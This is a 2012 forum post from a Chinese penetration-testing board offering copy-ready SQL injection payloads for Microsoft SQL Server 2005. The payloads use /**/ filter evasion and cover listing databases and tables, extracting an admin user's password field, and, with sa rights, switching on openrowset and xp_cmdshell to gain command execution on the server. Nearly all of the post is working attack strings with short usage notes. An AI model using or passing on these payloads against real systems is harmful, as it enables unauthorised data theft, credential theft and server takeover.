中国网络渗透测试联盟
标题:
MSsql2005注入语句
[打印本页]
作者:
admin
时间:
2012-9-13 17:19
标题:
MSsql2005注入语句
) ~; i: I. i1 P" h
& k, u. X& ]4 Q
B M0 b% ~$ s
[Copy to clipboard]CODE:
% K- q! j; Q/ \8 X N% C, s
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
$ k( Z) C) ^6 K% b$ H4 s4 G
5 N7 w, X! [) {# x6 I# v. ^2 d* t# X7 w* B
爆表语句,somedb部份是所要列的数据库,红色数字1累加
: d! q2 I( `; h9 S$ s/ c6 z* p, g; R$ d
; M: `7 ~% w- D7 k
* @5 H4 G* V3 X7 t6 u$ M3 _
[Copy to clipboard]CODE:
2 I' [; v- p( B
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
, \# o" E7 K: E6 }, j" }+ ]
' C, `& o1 G+ S5 Z: k$ n% X( m r% O
爆字段语句,爆表admin里user='icerover'的密码段
' W5 O0 [8 J7 D3 c7 n& o% v4 v6 @' P
4 e- w/ k! X! @( ]9 o3 @. _
1 V" L, S. N- ~6 H0 r1 y
[Copy to clipboard]CODE:
$ p1 ^" x4 G! R1 v+ M! A2 z4 c
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
- ^( h2 C" G. `4 W
# ~0 u! G* r0 V+ ]0 _
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
7 b- h# U" G# _1 ^1 u7 a
如果是sa权限,可以这样来开启
1 F2 H6 ?8 j* Z" Q$ g( {
开启openrowset
: M2 L8 K! ], j; R/ _1 H6 o; i
; v$ V3 @' `8 p' m& G
: L, l0 l5 ]7 ^7 E4 n. b( u
[Copy to clipboard]CODE:
7 S9 x0 z, x: o; I) g7 c7 m
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
& A/ i! Z ^. Y1 W- G2 O1 E$ ^2 m
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
4 O3 g8 q5 G! j% q$ |8 ^( ^2 N/ n( }
6 C3 }- y8 {; c: a9 _* s) n
开启xp_cmdshell
* ^7 A8 T7 }; n1 N6 N
! s, l, A' E" m
3 R8 f( W$ o4 D: Q% ?/ b; b% q
[Copy to clipboard]CODE:
- {, t4 h" [. e' [ u! w
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
. b% {8 P; R+ S- b8 F, s3 h3 C
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
3 l+ j1 W, {( P% Q4 Y4 y
& q5 P, T3 @* J/ m7 s
ok,over~~晚安
; T2 H: p$ O/ B) z8 w+ I) O
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2